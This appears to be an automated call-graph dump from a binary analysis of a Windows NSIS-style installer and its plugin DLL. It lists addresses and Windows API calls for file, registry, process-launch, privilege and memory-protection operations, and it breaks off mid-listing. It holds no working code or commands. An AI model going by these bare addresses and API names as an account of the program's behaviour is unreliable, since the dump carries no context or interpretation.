100015e1 4312->4315 4316 100015fb 4313->4316 4315->4316 4317 100015e6 wsprintfW 4315->4317 4318 10001272 4316->4318 4317->4316 4319 100012b5 GlobalFree 4318->4319 4320 1000127b GlobalAlloc lstrcpynW 4318->4320 4319->4220 4320->4319 4322 10001861 4321->4322 4323 1000247a 4321->4323 4322->4231 4322->4232 4323->4322 4324 10002496 GlobalFree 4323->4324 4324->4323 4326 10001272 2 API calls 4325->4326 4327 1000155e 4326->4327 4327->4226 4328->4239 4329->4243 4331 100015ad 4330->4331 4331->4264 4338 1000121b GlobalAlloc 4332->4338 4334 1000123b lstrcpynW 4334->4253 4335->4243 4336->4256 4337->4262 4338->4334 4340 100012c1 4339->4340 4341 1000122c 2 API calls 4340->4341 4342 100012df 4341->4342 4342->4276 4344 100025e7 VirtualAlloc 4343->4344 4345 1000263d 4343->4345 4344->4345 4345->4279 4346->4307 4348 100012ea 4347->4348 4349 1000130c 4347->4349 4348->4349 4350 100012f0 lstrcpyW 4348->4350 4349->4307 4350->4349 4351->4312 4797 4016c4 4798 402bbf 18 API calls 4797->4798 4799 4016ca GetFullPathNameW 4798->4799 4800 401706 4799->4800 4801 4016e4 4799->4801 4802 40171b GetShortPathNameW 4800->4802 4803 402a4c 4800->4803 4801->4800 4804 406393 2 API calls 4801->4804 4802->4803 4805 4016f6 4804->4805 4805->4800 4807 406050 lstrcpynW 4805->4807 4807->4800 4808 4014cb 4809 4051af 25 API calls 4808->4809 4810 4014d2 4809->4810 4811 40194e 4812 402bbf 18 API calls 4811->4812 4813 401955 lstrlenW 4812->4813 4814 402531 4813->4814 4815 4027ce 4816 4027d6 4815->4816 4817 4027da FindNextFileW 4816->4817 4820 4027ec 4816->4820 4818 402833 4817->4818 4817->4820 4821 406050 lstrcpynW 4818->4821 4821->4820 4565 401754 4566 402bbf 18 API calls 4565->4566 4567 40175b 4566->4567 4568 405c54 2 API calls 4567->4568 4569 401762 4568->4569 4570 405c54 2 API calls 4569->4570 4570->4569 4822 401d56 GetDC GetDeviceCaps 4823 402ba2 18 API calls 4822->4823 4824 401d74 MulDiv ReleaseDC 4823->4824 4825 402ba2 18 API calls 4824->4825 4826 401d93 4825->4826 4827 406072 18 API calls 4826->4827 4828 401dcc CreateFontIndirectW 4827->4828 4829 402531 4828->4829 4830 401a57 4831 402ba2 18 API calls 4830->4831 4832 401a5d 4831->4832 4833 402ba2 18 API calls 4832->4833 4834 401a05 4833->4834 4835 403857 4836 403862 4835->4836 4837 403869 GlobalAlloc 4836->4837 4838 403866 4836->4838 4837->4838 4839 4014d7 4840 402ba2 18 API calls 4839->4840 4841 4014dd Sleep 4840->4841 4843 402a4c 4841->4843 4844 40155b 4845 4029f2 4844->4845 4848 405f97 wsprintfW 4845->4848 4847 4029f7 4848->4847 4849 401ddc 4850 402ba2 18 API calls 4849->4850 4851 401de2 4850->4851 4852 402ba2 18 API calls 4851->4852 4853 401deb 4852->4853 4854 401df2 ShowWindow 4853->4854 4855 401dfd EnableWindow 4853->4855 4856 402a4c 4854->4856 4855->4856 4857 4022df 4858 402bbf 18 API calls 4857->4858 4859 4022ee 4858->4859 4860 402bbf 18 API calls 4859->4860 4861 4022f7 4860->4861 4862 402bbf 18 API calls 4861->4862 4863 402301 GetPrivateProfileStringW 4862->4863 4864 401bdf 4865 402ba2 18 API calls 4864->4865 4866 401be6 4865->4866 4867 402ba2 18 API calls 4866->4867 4869 401bf0 4867->4869 4868 401c00 4871 401c10 4868->4871 4872 402bbf 18 API calls 4868->4872 4869->4868 4870 402bbf 18 API calls 4869->4870 4870->4868 4873 401c1b 4871->4873 4874 401c5f 4871->4874 4872->4871 4876 402ba2 18 API calls 4873->4876 4875 402bbf 18 API calls 4874->4875 4877 401c64 4875->4877 4878 401c20 4876->4878 4879 402bbf 18 API calls 4877->4879 4880 402ba2 18 API calls 4878->4880 4881 401c6d FindWindowExW 4879->4881 4882 401c29 4880->4882 4885 401c8f 4881->4885 4883 401c31 SendMessageTimeoutW 4882->4883 4884 401c4f SendMessageW 4882->4884 4883->4885 4884->4885 4886 401960 4887 402ba2 18 API calls 4886->4887 4888 401967 4887->4888 4889 402ba2 18 API calls 4888->4889 4890 401971 4889->4890 4891 402bbf 18 API calls 4890->4891 4892 40197a 4891->4892 4893 40198e lstrlenW 4892->4893 4894 4019ca 4892->4894 4895 401998 4893->4895 4895->4894 4899 406050 lstrcpynW 4895->4899 4897 4019b3 4897->4894 4898 4019c0 lstrlenW 4897->4898 4898->4894 4899->4897 4900 404262 lstrlenW 4901 404281 4900->4901 4902 404283 WideCharToMultiByte 4900->4902 4901->4902 4903 401662 4904 402bbf 18 API calls 4903->4904 4905 401668 4904->4905 4906 406393 2 API calls 4905->4906 4907 40166e 4906->4907 4908 4019e4 4909 402bbf 18 API calls 4908->4909 4910 4019eb 4909->4910 4911 402bbf 18 API calls 4910->4911 4912 4019f4 4911->4912 4913 4019fb lstrcmpiW 4912->4913 4914 401a0d lstrcmpW 4912->4914 4915 401a01 4913->4915 4914->4915 4383 4025e5 4397 402ba2 4383->4397 4385 40272d 4386 40263a ReadFile 4386->4385 4393 4025f4 4386->4393 4387 4026d3 4387->4385 4387->4393 4400 405d06 SetFilePointer 4387->4400 4388 405ca8 ReadFile 4388->4393 4389 40267a MultiByteToWideChar 4389->4393 4390 40272f 4409 405f97 wsprintfW 4390->4409 4393->4385 4393->4386 4393->4387 4393->4388 4393->4389 4393->4390 4394 4026a0 SetFilePointer MultiByteToWideChar 4393->4394 4395 402740 4393->4395 4394->4393 4395->4385 4396 402761 SetFilePointer 4395->4396 4396->4385 4398 406072 18 API calls 4397->4398 4399 402bb6 4398->4399 4399->4393 4401 405d22 4400->4401 4406 405d3e 4400->4406 4402 405ca8 ReadFile 4401->4402 4403 405d2e 4402->4403 4404 405d47 SetFilePointer 4403->4404 4405 405d6f SetFilePointer 4403->4405 4403->4406 4404->4405 4407 405d52 4404->4407 4405->4406 4406->4387 4408 405cd7 WriteFile 4407->4408 4408->4406 4409->4385 4916 401e66 4917 402bbf 18 API calls 4916->4917 4918 401e6c 4917->4918 4919 4051af 25 API calls 4918->4919 4920 401e76 4919->4920 4921 405730 2 API calls 4920->4921 4922 401e7c 4921->4922 4923 40281e 4922->4923 4924 401edb CloseHandle 4922->4924 4925 401e8c WaitForSingleObject 4922->4925 4924->4923 4926 401e9e 4925->4926 4927 401eb0 GetExitCodeProcess 4926->4927 4930 406466 2 API calls 4926->4930 4928 401ec2 4927->4928 4929 401ecd 4927->4929 4933 405f97 wsprintfW 4928->4933 4929->4924 4932 401ea5 WaitForSingleObject 4930->4932 4932->4926 4933->4929 4419 401767 4420 402bbf 18 API calls 4419->4420 4421 40176e 4420->4421 4422 401796 4421->4422 4423 40178e 4421->4423 4459 406050 lstrcpynW 4422->4459 4458 406050 lstrcpynW 4423->4458 4426 4017a1 4428 405a04 3 API calls 4426->4428 4427 401794 4430 4062e4 5 API calls 4427->4430 4429 4017a7 lstrcatW 4428->4429 4429->4427 4436 4017b3 4430->4436 4431 406393 2 API calls 4431->4436 4433 405c00 2 API calls 4433->4436 4434 4017c5 CompareFileTime 4434->4436 4435 401885 4437 4051af 25 API calls 4435->4437 4436->4431 4436->4433 4436->4434 4436->4435 4439 406050 lstrcpynW 4436->4439 4445 406072 18 API calls 4436->4445 4454 405795 MessageBoxIndirectW 4436->4454 4456 40185c 4436->4456 4457 405c25 GetFileAttributesW CreateFileW 4436->4457 4440 40188f 4437->4440 4438 4051af 25 API calls 4444 401871 4438->4444 4439->4436 4441 403027 32 API calls 4440->4441 4442 4018a2 4441->4442 4443 4018b6 SetFileTime 4442->4443 4446 4018c8 FindCloseChangeNotification 4442->4446 4443->4446 4445->4436 4446->4444 4447 4018d9 4446->4447 4448 4018f1 4447->4448 4449 4018de 4447->4449 4451 406072 18 API calls 4448->4451 4450 406072 18 API calls 4449->4450 4452 4018e6 lstrcatW 4450->4452 4453 4018f9 4451->4453 4452->4453 4455 405795 MessageBoxIndirectW 4453->4455 4454->4436 4455->4444 4456->4438 4456->4444 4457->4436 4458->4427 4459->4426 4934 404568 4935 404578 4934->4935 4936 40459e 4934->4936 4937 404114 19 API calls 4935->4937 4938 40417b 8 API calls 4936->4938 4939 404585 SetDlgItemTextW 4937->4939 4940 4045aa 4938->4940 4939->4936 4941 100018a9 4942 100018cc 4941->4942 4943 100018ff GlobalFree 4942->4943 4944 10001911 4942->4944 4943->4944 4945 10001272 2 API calls 4944->4945 4946 10001a87 GlobalFree GlobalFree 4945->4946 4947 401ee9 4948 402bbf 18 API calls 4947->4948 4949 401ef0 4948->4949 4950 406393 2 API calls 4949->4950 4951 401ef6 4950->4951 4953 401f07 4951->4953 4954 405f97 wsprintfW 4951->4954 4954->4953 4955 4021ea 4956 402bbf 18 API calls 4955->4956 4957 4021f0 4956->4957 4958 402bbf 18 API calls 4957->4958 4959 4021f9 4958->4959 4960 402bbf 18 API calls 4959->4960 4961 402202 4960->4961 4962 406393 2 API calls 4961->4962 4963 40220b 4962->4963 4964 40221c lstrlenW lstrlenW 4963->4964 4965 40220f 4963->4965 4967 4051af 25 API calls 4964->4967 4966 4051af 25 API calls 4965->4966 4969 402217 4965->4969 4966->4969 4968 40225a SHFileOperationW 4967->4968 4968->4965 4968->4969 4970 40156b 4971 401584 4970->4971 4972 40157b ShowWindow 4970->4972 4973 401592 ShowWindow 4971->4973 4974 402a4c 4971->4974 4972->4971 4973->4974 4975 40226e 4976 402275 4975->4976 4979 402288 4975->4979 4977 406072 18 API calls 4976->4977 4978 402282 4977->4978 4980 405795 MessageBoxIndirectW 4978->4980 4980->4979 4981 4052ee 4982 405498 4981->4982 4983 40530f GetDlgItem GetDlgItem GetDlgItem 4981->4983 4985 4054a1 GetDlgItem CreateThread CloseHandle 4982->4985 4986 4054c9 4982->4986 5026 404149 SendMessageW 4983->5026 4985->4986 4988 4054e0 ShowWindow ShowWindow 4986->4988 4989 405519 4986->4989 4990 4054f4 4986->4990 4987 40537f 4995 405386 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4987->4995 5028 404149 SendMessageW 4988->5028 4994 40417b 8 API calls 4989->4994 4991 405554 4990->4991 4992 405508 4990->4992 4993 40552e ShowWindow 4990->4993 4991->4989 5003 405562 SendMessageW 4991->5003 4997 4040ed SendMessageW 4992->4997 4999 405540 4993->4999 5000 40554e 4993->5000 4998 405527 4994->4998 5001 4053f4 4995->5001 5002 4053d8 SendMessageW SendMessageW 4995->5002 4997->4989 5004 4051af 25 API calls 4999->5004 5005 4040ed SendMessageW 5000->5005 5006 405407 5001->5006 5007 4053f9 SendMessageW 5001->5007 5002->5001 5003->4998 5008 40557b CreatePopupMenu 5003->5008 5004->5000 5005->4991 5010 404114 19 API calls 5006->5010 5007->5006 5009 406072 18 API calls 5008->5009 5012 40558b AppendMenuW 5009->5012 5011 405417 5010->5011 5015 405420 ShowWindow 5011->5015 5016 405454 GetDlgItem SendMessageW 5011->5016 5013 4055a8 GetWindowRect 5012->5013 5014 4055bb TrackPopupMenu 5012->5014 5013->5014 5014->4998 5017 4055d6 5014->5017 5018 405443 5015->5018 5019 405436 ShowWindow 5015->5019 5016->4998 5020 40547b SendMessageW SendMessageW 5016->5020 5021 4055f2 SendMessageW 5017->5021 5027 404149 SendMessageW 5018->5027 5019->5018 5020->4998 5021->5021 5022 40560f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5021->5022 5024 405634 SendMessageW 5022->5024 5024->5024 5025 40565d GlobalUnlock SetClipboardData CloseClipboard 5024->5025 5025->4998 5026->4987 5027->5016 5028->4990 5029 4014f1 SetForegroundWindow 5030 402a4c 5029->5030 5031 401673 5032 402bbf 18 API calls 5031->5032 5033 40167a 5032->5033 5034 402bbf 18 API calls 5033->5034 5035 401683 5034->5035 5036 402bbf 18 API calls 5035->5036 5037 40168c MoveFileW 5036->5037 5038 401698 5037->5038 5039 40169f 5037->5039 5041 401423 25 API calls 5038->5041 5040 406393 2 API calls 5039->5040 5043 4021e1 5039->5043 5042 4016ae 5040->5042 5041->5043 5042->5043 5044 405ef1 38 API calls 5042->5044 5044->5038 5045 100016b6 5046 100016e5 5045->5046 5047 10001b18 22 API calls 5046->5047 5048 100016ec 5047->5048 5049 100016f3 5048->5049 5050 100016ff 5048->5050 5051 10001272 2 API calls 5049->5051 5052 10001726 5050->5052 5053 10001709 5050->5053 5058 100016fd 5051->5058 5055 10001750 5052->5055 5056 1000172c 5052->5056 5054 1000153d 3 API calls 5053->5054 5060 1000170e 5054->5060 5059 1000153d 3 API calls 5055->5059 5057 100015b4 3 API calls 5056->5057 5061 10001731 5057->5061 5059->5058 5062 100015b4 3 API calls 5060->5062 5063 10001272 2 API calls 5061->5063 5064 10001714 5062->5064 5065 10001737 GlobalFree 5063->5065 5066 10001272 2 API calls 5064->5066 5065->5058 5067 1000174b GlobalFree 5065->5067 5068 1000171a GlobalFree 5066->5068 5067->5058 5068->5058 5069 10002238 5070 10002296 5069->5070 5071 100022cc 5069->5071 5070->5071 5072 100022a8 GlobalAlloc 5070->5072 5072->5070 5073 401cfa GetDlgItem GetClientRect 5074 402bbf 18 API calls 5073->5074 5075 401d2c LoadImageW SendMessageW 5074->5075 5076 401d4a DeleteObject 5075->5076 5077 402a4c 5075->5077 5076->5077 4638 40237b 4639 402381 4638->4639 4640 402bbf 18 API calls 4639->4640 4641 402393 4640->4641 4642 402bbf 18 API calls 4641->4642 4643 40239d RegCreateKeyExW 4642->4643 4644 4023c7 4643->4644 4654 40281e 4643->4654 4645 4023e2 4644->4645 4646 402bbf 18 API calls 4644->4646 4648 402ba2 18 API calls 4645->4648 4650 4023ee 4645->4650 4647 4023d8 lstrlenW 4646->4647 4647->4645 4648->4650 4649 402409 RegSetValueExW 4652 40241f RegCloseKey 4649->4652 4650->4649 4651 403027 32 API calls 4650->4651 4651->4649 4652->4654 5078 4027fb 5079 402bbf 18 API calls 5078->5079 5080 402802 FindFirstFileW 5079->5080 5081 402815 5080->5081 5082 40282a 5080->5082 5083 402833 5082->5083 5086 405f97 wsprintfW 5082->5086 5087 406050 lstrcpynW 5083->5087 5086->5083 5087->5081 5088 1000103d 5089 1000101b 5 API calls 5088->5089 5090 10001056 5089->5090 5091 4014ff 5092 401507 5091->5092 5094 40151a 5091->5094 5093 402ba2 18 API calls 5092->5093 5093->5094 5095 401000 5096 401037 BeginPaint GetClientRect 5095->5096 5097 40100c DefWindowProcW 5095->5097 5099 4010f3 5096->5099 5100 401179 5097->5100 5101 401073 CreateBrushIndirect FillRect DeleteObject 5099->5101 5102 4010fc 5099->5102 5101->5099 5103 401102 CreateFontIndirectW 5102->5103 5104 401167 EndPaint 5102->5104 5103->5104 5105 401112 6 API calls 5103->5105 5104->5100 5105->5104 5106 401904 5107 40193b 5106->5107 5108 402bbf 18 API calls 5107->5108 5109 401940 5108->5109 5110 405841 69 API calls 5109->5110 5111 401949 5110->5111 5112 402d04 5113 402d16 SetTimer 5112->5113 5114 402d2f 5112->5114 5113->5114 5115 402d84 5114->5115 5116 402d49 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 5114->5116 5116->5115 5117 404905 5118 404931 5117->5118 5119 404915 5117->5119 5121 404964 5118->5121 5122 404937 SHGetPathFromIDListW 5118->5122 5128 405779 GetDlgItemTextW 5119->5128 5124 404947 5122->5124 5127 40494e SendMessageW 5122->5127 5123 404922 SendMessageW 5123->5118 5126 40140b 2 API calls 5124->5126 5126->5127 5127->5121 5128->5123 4410 402786 4411 40278d 4410->4411 4414 4029f7 4410->4414 4412 402ba2 18 API calls 4411->4412 4413 402798 4412->4413 4415 40279f SetFilePointer 4413->4415 4415->4414 4416 4027af 4415->4416 4418 405f97 wsprintfW 4416->4418 4418->4414 4460 100027c7 4461 10002817 4460->4461 4462 100027d7 VirtualProtect 4460->4462 4462->4461 5129 401907 5130 402bbf 18 API calls 5129->5130 5131 40190e 5130->5131 5132 405795 MessageBoxIndirectW 5131->5132 5133 401917 5132->5133 5134 401e08 5135 402bbf 18 API calls 5134->5135 5136 401e0e 5135->5136 5137 402bbf 18 API calls 5136->5137 5138 401e17 5137->5138 5139 402bbf 18 API calls 5138->5139 5140 401e20 5139->5140 5141 402bbf 18 API calls 5140->5141 5142 401e29 5141->5142 5143 401423 25 API calls 5142->5143 5144 401e30 ShellExecuteW 5143->5144 5145 401e61 5144->5145 5151 1000164f 5152 10001516 GlobalFree 5151->5152 5154 10001667 5152->5154 5153 100016ad GlobalFree 5154->5153 5155 10001682 5154->5155 5156 10001699 VirtualFree 5154->5156 5155->5153 5156->5153 5157 401a15 5158 402bbf 18 API calls 5157->5158 5159 401a1e ExpandEnvironmentStringsW 5158->5159 5160 401a32 5159->5160 5162 401a45 5159->5162 5161 401a37 lstrcmpW 5160->5161 5160->5162 5161->5162 5163 402095 5164 402bbf 18 API calls 5163->5164 5165 40209c 5164->5165 5166 402bbf 18 API calls 5165->5166 5167 4020a6 5166->5167 5168 402bbf 18 API calls 5167->5168 5169 4020b0 5168->5169 5170 402bbf 18 API calls 5169->5170 5171 4020ba 5170->5171 5172 402bbf 18 API calls 5171->5172 5174 4020c4 5172->5174 5173 402103 CoCreateInstance 5178 402122 5173->5178 5174->5173 5175 402bbf 18 API calls 5174->5175 5175->5173 5176 401423 25 API calls 5177 4021e1 5176->5177 5178->5176 5178->5177 5179 402515 5180 402bbf 18 API calls 5179->5180 5181 40251c 5180->5181 5184 405c25 GetFileAttributesW CreateFileW 5181->5184 5183 402528 5184->5183 5185 401b16 5186 402bbf 18 API calls 5185->5186 5187 401b1d 5186->5187 5188 402ba2 18 API calls 5187->5188 5189 401b26 wsprintfW 5188->5189 5190 402a4c 5189->5190 4594 10001058 4596 10001074 4594->4596 4595 100010dd 4596->4595 4597 10001092 4596->4597 4608 10001516 4596->4608 4599 10001516 GlobalFree 4597->4599 4600 100010a2 4599->4600 4601 100010b2 4600->4601 4602 100010a9 GlobalSize 4600->4602 4603 100010b6 GlobalAlloc 4601->4603 4604 100010c8 4601->4604 4602->4601 4605 1000153d 3 API calls 4603->4605 4607 100010d2 GlobalFree 4604->4607 4606 100010c7 4605->4606 4606->4604 4607->4595 4610 1000151c 4608->4610 4609 10001522 4609->4597 4610->4609 4611 1000152e GlobalFree 4610->4611 4611->4597 5191 40159b 5192 402bbf 18 API calls 5191->5192 5193 4015a2 SetFileAttributesW 5192->5193 5194 4015b4 5193->5194 4732 40229d 4733 4022a5 4732->4733 4734 4022ab 4732->4734 4736 402bbf 18 API calls 4733->4736 4735 4022b9 4734->4735 4737 402bbf 18 API calls 4734->4737 4738 4022c7 4735->4738 4739 402bbf 18 API calls 4735->4739 4736->4734 4737->4735 4740 402bbf 18 API calls 4738->4740 4739->4738 4741 4022d0 WritePrivateProfileStringW 4740->4741 5195 401f1d 5196 402bbf 18 API calls 5195->5196 5197 401f24 5196->5197 5198 40642a 5 API calls 5197->5198 5199 401f33 5198->5199 5200 401fb7 5199->5200 5201 401f4f GlobalAlloc 5199->5201 5201->5200 5202 401f63 5201->5202 5203 40642a 5 API calls 5202->5203 5204 401f6a 5203->5204 5205 40642a 5 API calls 5204->5205 5206 401f74 5205->5206 5206->5200 5210 405f97 wsprintfW 5206->5210 5208 401fa9 5211 405f97 wsprintfW 5208->5211 5210->5208 5211->5200 5212 40149e 5213 4014ac PostQuitMessage 5212->5213 5214 402288 5212->5214 5213->5214 5215 40249e 5216 402cc9 19 API calls 5215->5216 5217 4024a8 5216->5217 5218 402ba2 18 API calls 5217->5218 5219 4024b1 5218->5219 5220 4024d5 RegEnumValueW 5219->5220 5221 4024c9 RegEnumKeyW 5219->5221 5223 40281e 5219->5223 5222 4024ee RegCloseKey 5220->5222 5220->5223 5221->5222 5222->5223 5225 40231f 5226 402324 5225->5226 5227 40234f 5225->5227 5229 402cc9 19 API calls 5226->5229 5228 402bbf 18 API calls 5227->5228 5230 402356 5228->5230 5231 40232b 5229->5231 5236 402bff RegOpenKeyExW 5230->5236 5232 402bbf 18 API calls 5231->5232 5235 40236c 5231->5235 5234 40233c RegDeleteValueW RegCloseKey 5232->5234 5234->5235 5240 402c2a 5236->5240 5245 402c76 5236->5245 5237 402c50 RegEnumKeyW 5238 402c62 RegCloseKey 5237->5238 5237->5240 5241 40642a 5 API calls 5238->5241 5239 402c87 RegCloseKey 5239->5245 5240->5237 5240->5238 5240->5239 5242 402bff 5 API calls 5240->5242 5243 402c72 5241->5243 5242->5240 5244 402ca2 RegDeleteKeyW 5243->5244 5243->5245 5244->5245 5245->5235 3682 4032a0 SetErrorMode GetVersion 3683 4032d5 3682->3683 3684 4032db 3682->3684 3685 40642a 5 API calls 3683->3685 3770 4063ba GetSystemDirectoryW 3684->3770 3685->3684 3687 4032f1 lstrlenA 3687->3684 3688 403301 3687->3688 3773 40642a GetModuleHandleA 3688->3773 3691 40642a 5 API calls 3692 403310 #17 OleInitialize SHGetFileInfoW 3691->3692 3779 406050 lstrcpynW 3692->3779 3694 40334d GetCommandLineW 3780 406050 lstrcpynW 3694->3780 3696 40335f GetModuleHandleW 3697 403377 3696->3697 3781 405a31 3697->3781 3700 4034b0 GetTempPathW 3785 40326f 3700->3785 3702 4034c8 3703 403522 DeleteFileW 3702->3703 3704 4034cc GetWindowsDirectoryW lstrcatW 3702->3704 3795 402dee GetTickCount GetModuleFileNameW 3703->3795 3707 40326f 12 API calls 3704->3707 3706 40339f 3708 405a31 CharNextW 3706->3708 3713 403499 3706->3713 3716 40349b 3706->3716 3710 4034e8 3707->3710 3708->3706 3709 403536 3711 4035e9 3709->3711 3714 4035d9 3709->3714 3718 405a31 CharNextW 3709->3718 3710->3703 3712 4034ec GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3710->3712 3896 4037bf 3711->3896 3717 40326f 12 API calls 3712->3717 3713->3700 3823 403899 3714->3823 3879 406050 lstrcpynW 3716->3879 3722 40351a 3717->3722 3735 403555 3718->3735 3722->3703 3722->3711 3723 403723 3725 4037a7 ExitProcess 3723->3725 3726 40372b GetCurrentProcess OpenProcessToken 3723->3726 3724 403603 3903 405795 3724->3903 3728 403743 LookupPrivilegeValueW AdjustTokenPrivileges 3726->3728 3729 403777 3726->3729 3728->3729 3734 40642a 5 API calls 3729->3734 3731 4035b3 3880 405b0c 3731->3880 3732 403619 3907 405718 3732->3907 3739 40377e 3734->3739 3735->3731 3735->3732 3743 403793 ExitWindowsEx 3739->3743 3746 4037a0 3739->3746 3741 40363a lstrcatW lstrcmpiW 3741->3711 3745 403656 3741->3745 3742 40362f lstrcatW 3742->3741 3743->3725 3743->3746 3748 403662 3745->3748 3749 40365b 3745->3749 3945 40140b 3746->3945 3747 4035ce 3895 406050 lstrcpynW 3747->3895 3915 4056fb CreateDirectoryW 3748->3915 3910 40567e CreateDirectoryW 3749->3910 3755 403667 SetCurrentDirectoryW 3756 403682 3755->3756 3757 403677 3755->3757 3919 406050 lstrcpynW 3756->3919 3918 406050 lstrcpynW 3757->3918 3762 4036ce CopyFileW 3767 403690 3762->3767 3763 403717 3765 405ef1 38 API calls 3763->3765 3765->3711 3766 406072 18 API calls 3766->3767 3767->3763 3767->3766 3769 403702 CloseHandle 3767->3769 3920 406072 3767->3920 3938 405ef1 MoveFileExW 3767->3938 3942 405730 CreateProcessW 3767->3942 3769->3767 3771 4063dc wsprintfW LoadLibraryExW 3770->3771 3771->3687 3774 406450 GetProcAddress 3773->3774 3775 406446 3773->3775 3777 403309 3774->3777 3776 4063ba 3 API calls 3775->3776 3778 40644c 3776->3778 3777->3691 3778->3774 3778->3777 3779->3694 3780->3696 3782 405a37 3781->3782 3783 403386 CharNextW 3782->3783 3784 405a3e CharNextW 3782->3784 3783->3700 3783->3706 3784->3782 3948 4062e4 3785->3948 3787 403285 3787->3702 3788 40327b 3788->3787 3957 405a04 lstrlenW CharPrevW 3788->3957 3791 4056fb 2 API calls 3792 403293 3791->3792 3960 405c54 3792->3960 3964 405c25 GetFileAttributesW CreateFileW 3795->3964 3797 402e2e 3815 402e3e 3797->3815 3965 406050 lstrcpynW 3797->3965 3799 402e54 3966 405a50 lstrlenW 3799->3966 3803 402e65 GetFileSize 3804 402f61 3803->3804 3822 402e7c 3803->3822 3971 402d8a 3804->3971 3806 402f6a 3808 402f9a GlobalAlloc 3806->3808 3806->3815 4006 403258 SetFilePointer 3806->4006 3982 403258 SetFilePointer 3808->3982 3810 402fcd 3814 402d8a 6 API calls 3810->3814 3812 402f83 3816 403242 ReadFile 3812->3816 3813 402fb5 3983 403027 3813->3983 3814->3815 3815->3709 3818 402f8e 3816->3818 3818->3808 3818->3815 3819 402d8a 6 API calls 3819->3822 3820 402fc1 3820->3815 3820->3820 3821 402ffe SetFilePointer 3820->3821 3821->3815 3822->3804 3822->3810 3822->3815 3822->3819 4003 403242 3822->4003 3824 40642a 5 API calls 3823->3824 3825 4038ad 3824->3825 3826 4038b3 3825->3826 3827 4038c5 3825->3827 4041 405f97 wsprintfW 3826->4041 3828 405f1d 3 API calls 3827->3828 3829 4038f5 3828->3829 3831 403914 lstrcatW 3829->3831 3833 405f1d 3 API calls 3829->3833 3832 4038c3 3831->3832 4027 403b6f 3832->4027 3833->3831 3836 405b0c 18 API calls 3837 403946 3836->3837 3838 4039da 3837->3838 4036 405f1d RegOpenKeyExW 3837->4036 3839 405b0c 18 API calls 3838->3839 3842 4039e0 3839->3842 3841 4039f0 LoadImageW 3845 403a96 3841->3845 3846 403a17 RegisterClassW 3841->3846 3842->3841 3844 406072 18 API calls 3842->3844 3844->3841 3849 40140b 2 API calls 3845->3849 3848 403a4d SystemParametersInfoW CreateWindowExW 3846->3848 3878 403aa0 3846->3878 3847 403999 lstrlenW 3852 4039a7 lstrcmpiW 3847->3852 3853 4039cd 3847->3853 3848->3845 3850 403a9c 3849->3850 3857 403b6f 19 API calls 3850->3857 3850->3878 3851 405a31 CharNextW 3855 403996 3851->3855 3852->3853 3856 4039b7 GetFileAttributesW 3852->3856 3854 405a04 3 API calls 3853->3854 3858 4039d3 3854->3858 3855->3847 3859 4039c3 3856->3859 3861 403aad 3857->3861 4042 406050 lstrcpynW 3858->4042 3859->3853 3860 405a50 2 API calls 3859->3860 3860->3853 3863 403ab9 ShowWindow 3861->3863 3864 403b3c 3861->3864 3866 4063ba 3 API calls 3863->3866 4043 405282 OleInitialize 3864->4043 3868 403ad1 3866->3868 3867 403b42 3869 403b46 3867->3869 3870 403b5e 3867->3870 3871 403adf GetClassInfoW 3868->3871 3873 4063ba 3 API calls 3868->3873 3876 40140b 2 API calls 3869->3876 3869->3878 3872 40140b 2 API calls 3870->3872 3874 403af3 GetClassInfoW RegisterClassW 3871->3874 3875 403b09 DialogBoxParamW 3871->3875 3872->3878 3873->3871 3874->3875 3877 40140b 2 API calls 3875->3877 3876->3878 3877->3878 3878->3711 3879->3713 4058 406050 lstrcpynW 3880->4058 3882 405b1d 4059 405aaf CharNextW CharNextW 3882->4059 3885 4035bf 3885->3711 3894 406050 lstrcpynW 3885->3894 3886 4062e4 5 API calls 3892 405b33 3886->3892 3887 405b64 lstrlenW 3888 405b6f 3887->3888 3887->3892 3890 405a04 3 API calls 3888->3890 3891 405b74 GetFileAttributesW 3890->3891 3891->3885 3892->3885 3892->3887 3893 405a50 2 API calls 3892->3893 4065 406393 FindFirstFileW 3892->4065 3893->3887 3894->3747 3895->3714 3897 4037d7 3896->3897 3898 4037c9 CloseHandle 3896->3898 4068 403804 3897->4068 3898->3897 3905 4057aa 3903->3905 3904 403611 ExitProcess 3905->3904 3906 4057be MessageBoxIndirectW 3905->3906 3906->3904 3908 40642a 5 API calls 3907->3908 3909 40361e lstrcatW 3908->3909 3909->3741 3909->3742 3911 403660 3910->3911 3912 4056cf GetLastError 3910->3912 3911->3755 3912->3911 3913 4056de SetFileSecurityW 3912->3913 3913->3911 3914 4056f4 GetLastError 3913->3914 3914->3911 3916 40570b 3915->3916 3917 40570f GetLastError 3915->3917 3916->3755 3917->3916 3918->3756 3919->3767 3925 40607f 3920->3925 3921 4062ca 3922 4036c1 DeleteFileW 3921->3922 4126 406050 lstrcpynW 3921->4126 3922->3762 3922->3767 3924 406132 GetVersion 3924->3925 3925->3921 3925->3924 3926 406298 lstrlenW 3925->3926 3929 406072 10 API calls 3925->3929 3930 4061ad GetSystemDirectoryW 3925->3930 3931 405f1d 3 API calls 3925->3931 3932 4061c0 GetWindowsDirectoryW 3925->3932 3933 4062e4 5 API calls 3925->3933 3934 4061f4 SHGetSpecialFolderLocation 3925->3934 3935 406072 10 API calls 3925->3935 3936 406239 lstrcatW 3925->3936 4124 405f97 wsprintfW 3925->4124 4125 406050 lstrcpynW 3925->4125 3926->3925 3929->3926 3930->3925 3931->3925 3932->3925 3933->3925 3934->3925 3937 40620c SHGetPathFromIDListW CoTaskMemFree 3934->3937 3935->3925 3936->3925 3937->3925 3939 405f12 3938->3939 3940 405f05 3938->3940 3939->3767 4127 405d7f lstrcpyW 3940->4127 3943 405763 CloseHandle 3942->3943 3944 40576f 3942->3944 3943->3944 3944->3767 3946 401389 2 API calls 3945->3946 3947 401420 3946->3947 3947->3725 3955 4062f1 3948->3955 3949 40636c CharPrevW 3953 406367 3949->3953 3950 40635a CharNextW 3950->3953 3950->3955 3951 40638d 3951->3788 3952 405a31 CharNextW 3952->3955 3953->3949 3953->3951 3954 406346 CharNextW 3954->3955 3955->3950 3955->3952 3955->3953 3955->3954 3956 406355 CharNextW 3955->3956 3956->3950 3958 405a20 lstrcatW 3957->3958 3959 40328d 3957->3959 3958->3959 3959->3791 3961 405c61 GetTickCount GetTempFileNameW 3960->3961 3962 40329e 3961->3962 3963 405c97 3961->3963 3962->3702 3963->3961 3963->3962 3964->3797 3965->3799 3967 405a5e 3966->3967 3968 402e5a 